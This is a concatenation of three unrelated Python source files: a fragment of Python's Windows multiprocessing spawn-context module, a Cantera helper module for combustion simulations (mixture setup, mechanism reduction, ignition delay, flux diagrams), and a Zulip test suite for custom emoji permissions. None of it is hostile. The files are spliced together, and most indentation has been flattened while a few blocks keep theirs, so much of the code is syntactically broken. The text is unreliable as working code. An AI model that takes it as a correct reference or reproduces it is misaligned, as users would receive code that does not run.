class SpawnProcess(process.BaseProcess):
_start_method = 'spawn'
@staticmethod
def _Popen(process_obj):
from .popen_spawn_win32 import Popen
return Popen(process_obj)
class SpawnContext(BaseContext):
_name = 'spawn'
Process = SpawnProcess
_concrete_contexts = {
'spawn': SpawnContext(),
}
_default_context = DefaultContext(_concrete_contexts['spawn'])
#
# Force the start method
#
def _force_start_method(method):
_default_context._actual_context = _concrete_contexts[method]
#
# Check that the current thread is spawning a child process
#
_tls = threading.local()
def get_spawning_popen():
return getattr(_tls, 'spawning_popen', None)
def set_spawning_popen(popen):
_tls.spawning_popen = popen
def assert_spawning(obj):
if get_spawning_popen() is None:
raise RuntimeError(
'%s objects should only be shared between processes'
' through inheritance' % type(obj).__name__
)
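# --- usage sketch (illustrative only; not part of the stdlib module) ---------
# User code normally reaches the context classes above through the public
# multiprocessing API rather than importing this module directly, e.g.:
#
#     import multiprocessing as mp
#     ctx = mp.get_context('spawn')       # a SpawnContext on every platform
#     with ctx.Pool(2) as pool:
#         print(pool.map(abs, [-1, -2]))  # -> [1, 2]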
|
|
# -*- coding: utf-8 -*-
import numpy as np
import cantera as ct
import pandas as pd
import re
import warnings
import copy
###################################
# 1a. system setup
###################################
def get_initial_mole_fractions(stoich_ratio,
fuel_mole_ratios,
oxygen_per_fuel_at_stoich_list,
fuels = None):
"""
    This method obtains the initial mole fractions for fuel in air.
    The result is returned as a dictionary listing nitrogen, oxygen, and then
    the fuels.
    stoich_ratio = oxygen to fuel stoichiometric ratio in the system
    fuels = list of cantera fuel names for the output dictionary. If omitted, a list is returned
    fuel_mole_ratios = list of molar ratios of the various fuels (must sum to 1)
    oxygen_per_fuel_at_stoich_list = a list containing the number of oxygen
            molecules necessary for full combustion of each fuel molecule. For
            example, methane would be 2.
"""
    # error check
    np.testing.assert_allclose(sum(fuel_mole_ratios), 1.,
                               err_msg="mole ratios of fuels must sum to one")
assert len(fuel_mole_ratios) ==len(oxygen_per_fuel_at_stoich_list)
combined_oxygen_per_fuel = np.sum(np.multiply(fuel_mole_ratios,oxygen_per_fuel_at_stoich_list))
total_fuel = sum(fuel_mole_ratios)
total_oxygen = total_fuel * combined_oxygen_per_fuel / stoich_ratio
total_nitrogen = total_oxygen * .79/.21
total_species = total_fuel + total_oxygen + total_nitrogen
mole_fractions = np.concatenate(([total_nitrogen, total_oxygen],fuel_mole_ratios),0)
normalized_mole_fractions = mole_fractions/total_species
if fuels:
fuel_zip = [(fuels[index],normalized_mole_fractions[index+2]) for index in range(len(fuels))]
air_zip = [('N2',normalized_mole_fractions[0]),('O2',normalized_mole_fractions[1])]
mole_fraction_dictionary = dict(air_zip+fuel_zip)
for species, fraction in list(mole_fraction_dictionary.items()):
if fraction < 1e-10:
del mole_fraction_dictionary[species]
return mole_fraction_dictionary
else:
return normalized_mole_fractions
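# Illustrative example (not part of the original module): a stoichiometric
# methane/air mixture. CH4 needs 2 O2 per molecule, so with stoich_ratio=1:
#
#     get_initial_mole_fractions(stoich_ratio=1.0,
#                                fuel_mole_ratios=[1.0],
#                                oxygen_per_fuel_at_stoich_list=[2],
#                                fuels=['CH4'])
#     # -> roughly {'N2': 0.715, 'O2': 0.190, 'CH4': 0.095}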
def create_mechanism(full_model_file_path,kept_reaction_equations='all', remove_reaction_equations=None,
non_reactive_species = ['AR','N2','HE']):
"""
This is a convenience method for reducing mechanisms when reading cantera
files.
input the full model and a list of reaction equations that you'd like to keep
or a list of reaction equations to remove.
This method should retain or remove all instances of the reactions
    returns a Cantera.Solution object of the mechanism with only the corresponding
reactions and their species.
"""
desired_file = full_model_file_path
spec = ct.Species.listFromFile(desired_file)
rxns = ct.Reaction.listFromFile(desired_file)
if remove_reaction_equations is not None:
if isinstance(remove_reaction_equations,list):
rxn_index = 0
while rxn_index < len(rxns):
rxn_eq = rxns[rxn_index].equation
if rxn_eq in remove_reaction_equations:
del rxns[rxn_index]
else:
rxn_index += 1
reduced_species = eliminate_species_from_mechanism(spec,rxns,non_reactive_species)
return ct.Solution(thermo='IdealGas', kinetics='GasKinetics',
species=reduced_species, reactions=rxns)
else:
raise TypeError('remove reaction equations must be a list if specified. It is currently {}'.format(remove_reaction_equations))
if kept_reaction_equations=='all':
return ct.Solution(full_model_file_path)
else:
reduced_reactions = reduce_reactions_in_mechanism(rxns,kept_reaction_equations)
reduced_species = eliminate_species_from_mechanism(spec,reduced_reactions,non_reactive_species)
return ct.Solution(thermo='IdealGas', kinetics='GasKinetics',
species=reduced_species, reactions=reduced_reactions)
###################################
# 1b. mechanism reduction
###################################
def reduce_reactions_in_mechanism(reaction_list, kept_reaction_equations):
"""
finds reactions that match the form of the reaction equations in
kept_reaction_equations. It returns just the reactions that are meant
to be in the mechanism.
reaction_list = list of cantera Reaction objects
kept_reaction_equations = list of strings of reaction equations to keep.
    Raises an Exception if any equation in kept_reaction_equations is not found
    in reaction_list (or appears more than once).
"""
reduced_reaction_list = []
found_reaction = np.full(len(kept_reaction_equations), False, dtype=bool)
for reaction in reaction_list:
if reaction.equation in kept_reaction_equations:
reduced_reaction_list.append(reaction)
found_reaction[kept_reaction_equations.index(reaction.equation)] = True
if not all(found_reaction):
reactions_missed = np.array(kept_reaction_equations)[~ found_reaction]
raise Exception('Reactions not found in solution or appear twice in the kept_reaction_list: ' + \
str(reactions_missed) + \
str())
return reduced_reaction_list
def eliminate_species_from_mechanism(species_list, kept_reactions,inert_species):
"""
finds all the species in kept_reactions, and returns a list of species
objects of those species. inert_species are automatically kept.
"""
reacting_species = []
for reaction in kept_reactions:
reacting_species += list(reaction.reactants.keys()) + list(reaction.products.keys())
# remove duplicates and add inert
reduced_species_name_list = list(set(reacting_species)) + inert_species
reduced_species_list = []
for species in species_list:
if species.name in reduced_species_name_list:
reduced_species_list.append(species)
return reduced_species_list
###################################
# 1c. run mechanism
###################################
def run_simulation(solution, times, conditions=None,
condition_type = 'adiabatic-constant-volume',
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
atol = 1e-15,
rtol = 1e-9,
temperature_values=None):
"""
This method iterates through the cantera solution object and outputs information
about the simulation as a pandas.DataFrame object.
This method returns a dictionary with the reaction conditions data, species data,
net reaction data, forward/reverse reaction data, and the rate of production
and consumption (or `None` if a variable not specified).
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial
species (will be deprecated. Set parameters before running)
    `times` = an iterable of times at which you would like to store information
`condition_type` = string describing the run type
`output_species` = output a DataFrame of species' concentrations
`output_reactions` = output a DataFrame of net reaction rates
`output_directional_reactions` = output a DataFrame of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
condition_types supported
#########################
'adiabatic-constant-volume' - assumes no heat transfer and no volume change
'constant-temperature-and-pressure' - no solving energy equation or changing
rate constants
'constant-temperature-and-volume' - no solving energy equation but allows
for pressure to change with reactions
    'specified-temperature-constant-volume' - the temperature profile specified by
                        `temperature_values`, which corresponds to the
input `times`, alters the temperature right before
the next time step is taken. Constant volume is assumed.
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
elif condition_type == 'constant-temperature-and-pressure':
reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
elif condition_type == 'constant-temperature-and-volume':
reactor = ct.IdealGasReactor(solution, energy='off')
elif condition_type == 'specified-temperature-constant-volume':
reactor = ct.IdealGasReactor(solution, energy='off')
if temperature_values is None:
raise AttributeError('Must specify temperature with `temperature_values` parameter')
elif len(times) != len(temperature_values):
raise AttributeError('`times` (len {0}) and `temperature_values` (len {1}) must have the same length.'.format(len(times),len(temperature_values)))
else:
supported_types = ['adiabatic-constant-volume','constant-temperature-and-pressure',
'constant-temperature-and-volume','specified-temperature-constant-volume']
raise NotImplementedError('only {0} are supported. {1} input'.format(supported_types, condition_type))
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
# setup data storage
outputs = {}
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
for time_index, time in enumerate(times):
if condition_type == 'specified-temperature-constant-volume':
solution.TD = temperature_values[time_index], solution.density
reactor = ct.IdealGasReactor(solution, energy='off')
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
if time_index > 0:
simulator.set_initial_time(times[time_index-1])
simulator.advance(time)
# save data
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
# set indexes as time
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
return outputs
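# --- usage sketch (illustrative only) -----------------------------------------
# A typical call with a GRI-Mech 3.0 gas object (the mechanism file name
# depends on the installed Cantera version; 'gri30.cti' is only an assumption):
#
#     gas = ct.Solution('gri30.cti')
#     gas.TPX = 1000.0, ct.one_atm, 'CH4:0.095, O2:0.19, N2:0.715'
#     out = run_simulation(gas, np.linspace(1e-5, 1e-2, 50))
#     out['conditions']['temperature (K)'].plot()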
def run_simulation_till_conversion(solution, species, conversion,conditions=None,
condition_type = 'adiabatic-constant-volume',
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
skip_data = 150,
atol = 1e-15,
rtol = 1e-9,):
"""
This method iterates through the cantera solution object and outputs information
about the simulation as a pandas.DataFrame object.
This method returns a dictionary with the reaction conditions data, species data,
net reaction data, forward/reverse reaction data, and the rate of production
and consumption (or `None` if a variable not specified) at the specified conversion value.
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial
species
`species` = a string of the species label (or list of strings) to be used in conversion calculations
`conversion` = a float of the fraction conversion to stop the simulation at
`condition_type` = string describing the run type, currently supports
'adiabatic-constant-volume' and 'constant-temperature-and-pressure'
`output_species` = output a Series of species' concentrations
`output_reactions` = output a Series of net reaction rates
`output_directional_reactions` = output a Series of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
`skip_data` = an integer which reduces storing each point of data.
storage space scales as 1/`skip_data`
"""
if conditions is not None:
solution.TPX = conditions
    if condition_type == 'adiabatic-constant-volume':
        reactor = ct.IdealGasReactor(solution)
    elif condition_type == 'constant-temperature-and-pressure':
        reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
    else:
        raise NotImplementedError("only 'adiabatic-constant-volume' and "
                                  "'constant-temperature-and-pressure' are supported")
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
# setup data storage
outputs = {}
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
if isinstance(species,str):
target_species_indexes = [solution.species_index(species)]
else: # must be a list or tuple
target_species_indexes = [solution.species_index(s) for s in species]
starting_concentration = sum([solution.concentrations[target_species_index] for target_species_index in target_species_indexes])
proper_conversion = False
new_conversion = 0
skip_count = 1e8
while not proper_conversion:
error_count = 0
while error_count >= 0:
try:
simulator.step()
error_count = -1
except:
error_count += 1
if error_count > 10:
print('Might not be possible to achieve conversion at T={0}, P={1}, with concentrations of {2} obtaining a conversion of {3} at time {4} s.'.format(solution.T,solution.P,zip(solution.species_names,solution.X), new_conversion,simulator.time))
raise
new_conversion = 1-sum([solution.concentrations[target_species_index] for target_species_index in target_species_indexes])/starting_concentration
if new_conversion > conversion:
proper_conversion = True
# save data
if skip_count > skip_data or proper_conversion:
skip_count = 0
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
skip_count += 1
# set indexes as time
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
return outputs
def find_ignition_delay(solution, conditions=None,
condition_type = 'adiabatic-constant-volume',
output_profile = False,
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
temp_final = 965,
time_final = 1000,
skip_data = 150,):
"""
This method finds the ignition delay of a cantera solution object with
an option to return all species and reactions as a pandas.DataFrame object
which can be stored.
    The method calculates ignition delay by integrating until the temperature is near
    `temp_final`, and then locating the maximum rate of temperature change with
    time, $\frac{dT}{dt}$. The time value corresponding to this maximum is taken
    as the ignition delay.
This method returns a tuple with ignition delay and the species and
reaction data, and the rate of production and consumption (or `None`
if not specified).
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial species
`condition_type` = string describing the run type, currently only 'adiabatic-constant-volume' supported
`output_profile` = should the program save simulation results and output them (True),
or should it just give the ignition delay (False)
`output_species` = output a Series of species' concentrations
`output_reactions` = output a Series of net reaction rates
`output_directional_reactions` = output a Series of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
    `temp_final` = the temperature at which ignition is reported
`time_final` = the time to cut off the simulation if the temperature never
reaches `temp_final`
`skip_data` = an integer which reduces storing each point of data.
storage space scales as 1/`skip_data`
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
else:
raise NotImplementedError('only adiabatic constant volume is supported')
# setup data storage
outputs = {}
if output_profile:
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
# run simulation
max_time = time_final
old_time = -1
old_temp = reactor.T
max_dTdt = 0
max_dTdt_time = 0
data_storage = 1e8 # large number to ensure first data point taken
while simulator.time < time_final:
simulator.step()
if data_storage > skip_data:
data_storage = 1
if time_final == max_time and reactor.T > temp_final:
time_final = simulator.time * 1.01 # go just beyond the final temperature
if output_profile:
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
# find ignition delay
dTdt = (reactor.T - old_temp) / (simulator.time - old_time)
if dTdt > max_dTdt:
max_dTdt = dTdt
max_dTdt_time = simulator.time
old_temp = reactor.T
old_time = simulator.time
data_storage += 1
# set indexes as time
if output_profile:
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
# save ignition_delay
outputs['ignition_delay'] = max_dTdt_time
return outputs
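# --- usage sketch (illustrative only) -----------------------------------------
#     gas = ct.Solution('gri30.cti')   # assumed mechanism file name
#     gas.TPX = 900.0, 10 * ct.one_atm, 'CH4:0.095, O2:0.19, N2:0.715'
#     result = find_ignition_delay(gas, output_profile=False)
#     print(result['ignition_delay'])  # ignition delay in seconds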
def save_flux_diagrams(solution, times, conditions=None,
condition_type = 'adiabatic-constant-volume',
path = '.', element = 'C', filename= 'flux_diagram',
filetype = 'png'):
"""
This method is similar to run_simulation but it saves reaction path
diagrams instead of returning objects.
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
elif condition_type == 'constant-temperature-and-pressure':
reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
else:
raise NotImplementedError('only "adiabatic-constant-volume" or "constant-temperature-and-pressure" is supported. {} input'.format(condition_type))
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
for time in times:
simulator.advance(time)
save_flux_diagram(solution,filename=filename+'_{:.2e}s'.format(simulator.time),
path = path, element=element, filetype = filetype)
###################################
# 1d. saving data helper methods
###################################
def get_data_series(simulator,solution, basics= ['time','temperature','pressure','density'],
add_species = True, species_names='all',
add_rxns = False, reaction_names='all'):
"""
    a wrapper function around `get_conditions_series`, `get_species_series`, and
    `get_reaction_series`.
    Deprecated and may be removed in the future.
"""
conditions = get_conditions_series(simulator,solution, basics)
if add_species:
species_series = get_species_series(solution, species_names)
conditions = pd.concat([conditions,species_series])
if add_rxns:
rxn_series = get_reaction_series(solution, reaction_names)
conditions = pd.concat([conditions,rxn_series])
return conditions
def get_conditions_series(simulator, reactor, solution,
basics= ['time','temperature','pressure','density','volume','enthalpy','internal energy']):
"""
    returns the current conditions of a Solution object contained in a ReactorNet
    object (simulator) as a pd.Series.
    simulator = the ReactorNet object of the simulation
    solution = solution object to pull values from
    basics = a list of state variables to save
The following are enabled for the conditions:
* time
* temperature
* pressure
* density
* volume
* cp (constant pressure heat capacity)
* cv (constant volume heat capacity)
    * enthalpy
    * internal energy
    """
conditions = pd.Series()
# add regular conditions
if 'time' in basics:
conditions['time (s)'] = simulator.time
if 'temperature' in basics:
conditions['temperature (K)'] = solution.T
if 'pressure' in basics:
conditions['pressure (Pa)'] = solution.P
if 'density' in basics:
conditions['density (kmol/m3)'] = solution.density_mole
if 'volume' in basics:
conditions['volume (m3)'] = reactor.volume
if 'cp' in basics:
conditions['heat capacity, cp (J/kmol/K)'] = solution.cp_mole
if 'cv' in basics:
conditions['heat capacity, cv (J/kmol/K)'] = solution.cv_mole
if 'enthalpy' in basics:
conditions['enthalpy (J/kg)'] = solution.enthalpy_mass
if 'internal energy' in basics:
conditions['internal energy (J/kg)'] = solution.int_energy_mass
return conditions
def get_species_series(solution, species_names = 'all'):
"""
returns a pandas.Series of the desired species' concentrations
solution = the cantera.Solution object for the simulation
species_names = list of species names to be saved (default is all)
"""
series = pd.Series()
if species_names=='all':
species_recorded = solution.species_names
else:
species_recorded = species_names
mole_fractions = solution.mole_fraction_dict()
for name in species_recorded:
try:
series[name] = mole_fractions[name] * solution.density_mole
except KeyError:
series[name] = 0
# sends warning if user typed species incorrectly
if name not in solution.species_names:
                warnings.warn('{} is not listed in the mole fraction dictionary and may be misspelled.'.format(name))
return series
def get_reaction_series(solution, reaction_names = 'all'):
"""
returns a pandas.Series of the desired reactions' net rates
solution = the cantera.Solution object for the simulation
    reaction_names = list of reaction names to be saved (default is all)
"""
series = pd.Series()
if reaction_names=='all':
reaction_names = solution.reaction_equations()
reaction_rates = __get_rxn_rate_dict(solution.reaction_equations(),solution.net_rates_of_progress)
for name in reaction_names:
try:
series[name] = reaction_rates[name]
except KeyError:
series[name] = 0
warnings.warn('{} is not listed in the reaction names.'.format(name))
return series
def get_forward_and_reverse_reactions_series(solution):
"""
This method returns a series of the forward and reverse reactions
"""
reaction_equations = solution.reaction_equations()
forward_reactions = pd.Series(__get_rxn_rate_dict(reaction_equations,solution.forward_rates_of_progress))
reverse_reactions = pd.Series(__get_rxn_rate_dict(reaction_equations,solution.reverse_rates_of_progress))
forward_reactions.index = pd.MultiIndex.from_product([['forward'],forward_reactions.index], names = ['direction','reaction'])
reverse_reactions.index = pd.MultiIndex.from_product([['reverse'],reverse_reactions.index], names = ['direction','reaction'])
return pd.concat([forward_reactions,reverse_reactions])
def get_rop_and_roc_series(solution):
"""
returns rate of production and rate of consumption to dataframe (kmol/m3s)
This data is primarily useful for quasi-steady state analysis
"""
species = solution.species_names
production = pd.Series(__get_rxn_rate_dict(species,solution.creation_rates))
consumption = pd.Series(__get_rxn_rate_dict(species,solution.destruction_rates))
assert isinstance(production.index,pd.Index)
assert isinstance(consumption.index,pd.Index)
production.index = pd.MultiIndex.from_product([['production'],production.index])
consumption.index = pd.MultiIndex.from_product([['consumption'],consumption.index])
return pd.concat([production,consumption])
def __get_rxn_rate_dict(reaction_equations, net_rates):
"""
    makes a dictionary out of the two inputs. If identical reactions are encountered
    (called duplicates in Cantera), the method merges them and sums their rates together.
"""
rxn_dict = {}
for equation, rate in zip(reaction_equations, net_rates):
try:
rxn_dict[equation] += rate
except KeyError:
rxn_dict[equation] = rate
return rxn_dict
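# Illustrative example (not part of the original module): duplicate reactions
# are merged, e.g.
#     __get_rxn_rate_dict(['A <=> B', 'A <=> B', 'B <=> C'], [1.0, 2.0, 0.5])
#     # -> {'A <=> B': 3.0, 'B <=> C': 0.5}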
def save_flux_diagram(kinetics, path = '.', element = 'C', filename= 'flux_diagram',
filetype = 'png'):
"""
makes a flux diagram and saves it to the designated file.
kinetics is a solution object
path is the path to the designated storage
    element is the element to be traced. Isotopes can also be traced
    filename is the filename to store it as
    filetype is the type to store the file as (any available from http://graphviz.org/doc/info/output.html)
"""
import os
diagram = ct.ReactionPathDiagram(kinetics, element)
diagram.label_threshold = 0.00001
dot_file = 'temp.dot'
img_file = filename + '.' + filetype
img_path = os.path.join(path, img_file)
diagram.write_dot(dot_file)
error = os.system('dot {0} -T{2} -o{1} -Gdpi=200'.format(dot_file, img_path,filetype))
if error:
        raise OSError('dot was not able to create the desired image. error number: {}. Is graphviz installed?'.format(error))
else:
print("Wrote graphviz output file to '{0}'.".format(img_path))
os.remove(dot_file)
|
|
# -*- coding: utf-8 -*-
import mock
from zerver.lib.actions import do_create_realm, do_create_user, \
check_add_realm_emoji
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import get_test_image_file
from zerver.models import Realm, RealmEmoji, UserProfile, get_realm
class RealmEmojiTest(ZulipTestCase):
def create_test_emoji(self, name: str, author: UserProfile) -> RealmEmoji:
with get_test_image_file('img.png') as img_file:
realm_emoji = check_add_realm_emoji(realm=author.realm,
name=name,
author=author,
image_file=img_file)
if realm_emoji is None:
raise Exception("Error creating test emoji.") # nocoverage
return realm_emoji
def create_test_emoji_with_no_author(self, name: str, realm: Realm) -> RealmEmoji:
realm_emoji = RealmEmoji.objects.create(realm=realm, name=name)
return realm_emoji
def test_list(self) -> None:
emoji_author = self.example_user('iago')
self.login(emoji_author.email)
self.create_test_emoji('my_emoji', emoji_author)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
self.assertEqual(len(result.json()["emoji"]), 2)
def test_list_no_author(self) -> None:
email = self.example_email('iago')
self.login(email)
realm = get_realm('zulip')
realm_emoji = self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
content = result.json()
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIsNone(test_emoji['author'])
def test_list_admins_only(self) -> None:
# Test that realm emoji list is public and realm emojis
# having no author are also there in the list.
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
realm_emoji = self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
content = result.json()
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIsNone(test_emoji['author'])
def test_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
realm_emoji = RealmEmoji.objects.get(name="my_emoji")
self.assertEqual(realm_emoji.author.email, email)
result = self.client_get("/json/realm/emoji")
content = result.json()
self.assert_json_success(result)
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIn('author', test_emoji)
self.assertEqual(test_emoji['author']['email'], email)
def test_realm_emoji_repr(self) -> None:
realm_emoji = RealmEmoji.objects.get(name='green_tick')
file_name = str(realm_emoji.id) + '.png'
self.assertEqual(
str(realm_emoji),
'<RealmEmoji(zulip): %s green_tick False %s>' % (realm_emoji.id, file_name)
)
def test_upload_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_em*oji', info=emoji_data)
self.assert_json_error(result, 'Invalid characters in emoji name')
def test_upload_uppercase_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_EMoji', info=emoji_data)
self.assert_json_error(result, 'Invalid characters in emoji name')
def test_upload_admins_only(self) -> None:
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, 'Must be an organization administrator')
def test_upload_anyone(self) -> None:
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = False
realm.save()
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
def test_emoji_upload_by_guest_user(self) -> None:
email = self.example_email('polonius')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, 'Not allowed for guest users')
def test_delete(self) -> None:
emoji_author = self.example_user('iago')
self.login(emoji_author.email)
realm_emoji = self.create_test_emoji('my_emoji', emoji_author)
result = self.client_delete('/json/realm/emoji/my_emoji')
self.assert_json_success(result)
result = self.client_get("/json/realm/emoji")
emojis = result.json()["emoji"]
self.assert_json_success(result)
# We only mark an emoji as deactivated instead of
# removing it from the database.
self.assertEqual(len(emojis), 2)
test_emoji = emojis[str(realm_emoji.id)]
self.assertEqual(test_emoji["deactivated"], True)
def test_delete_no_author(self) -> None:
email = self.example_email('iago')
self.login(email)
realm = get_realm('zulip')
self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_delete('/json/realm/emoji/my_emoji')
self.assert_json_success(result)
def test_delete_admins_only(self) -> None:
emoji_author = self.example_user('othello')
self.login(emoji_author.email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
self.create_test_emoji_with_no_author("my_emoji", realm)
result = self.client_delete("/json/realm/emoji/my_emoji")
self.assert_json_error(result, 'Must be an organization administrator')
def test_delete_admin_or_author(self) -> None:
        # If any user in a realm can upload emoji, then the user who
        # uploaded an emoji, as well as an admin, should be able to delete it.
emoji_author = self.example_user('othello')
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = False
realm.save()
self.create_test_emoji('my_emoji_1', emoji_author)
self.login(emoji_author.email)
result = self.client_delete("/json/realm/emoji/my_emoji_1")
self.assert_json_success(result)
self.logout()
self.create_test_emoji('my_emoji_2', emoji_author)
self.login(self.example_email('iago'))
result = self.client_delete("/json/realm/emoji/my_emoji_2")
self.assert_json_success(result)
self.logout()
self.create_test_emoji('my_emoji_3', emoji_author)
self.login(self.example_email('cordelia'))
result = self.client_delete("/json/realm/emoji/my_emoji_3")
self.assert_json_error(result, 'Must be an organization administrator or emoji author')
def test_delete_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
result = self.client_delete("/json/realm/emoji/invalid_emoji")
self.assert_json_error(result, "Emoji 'invalid_emoji' does not exist")
def test_multiple_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1, get_test_image_file('img.png') as fp2:
result = self.client_post('/json/realm/emoji/my_emoji', {'f1': fp1, 'f2': fp2})
self.assert_json_error(result, 'You must upload exactly one file.')
def test_emoji_upload_file_size_error(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp:
with self.settings(MAX_EMOJI_FILE_SIZE=0):
result = self.client_post('/json/realm/emoji/my_emoji', {'file': fp})
self.assert_json_error(result, 'Uploaded file is larger than the allowed limit of 0 MB')
def test_upload_already_existed_emoji(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/green_tick', info=emoji_data)
self.assert_json_error(result, 'A custom emoji with this name already exists.')
def test_reupload(self) -> None:
        # A user should be able to re-upload an emoji with the same name.
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
result = self.client_delete("/json/realm/emoji/my_emoji")
self.assert_json_success(result)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
result = self.client_get("/json/realm/emoji")
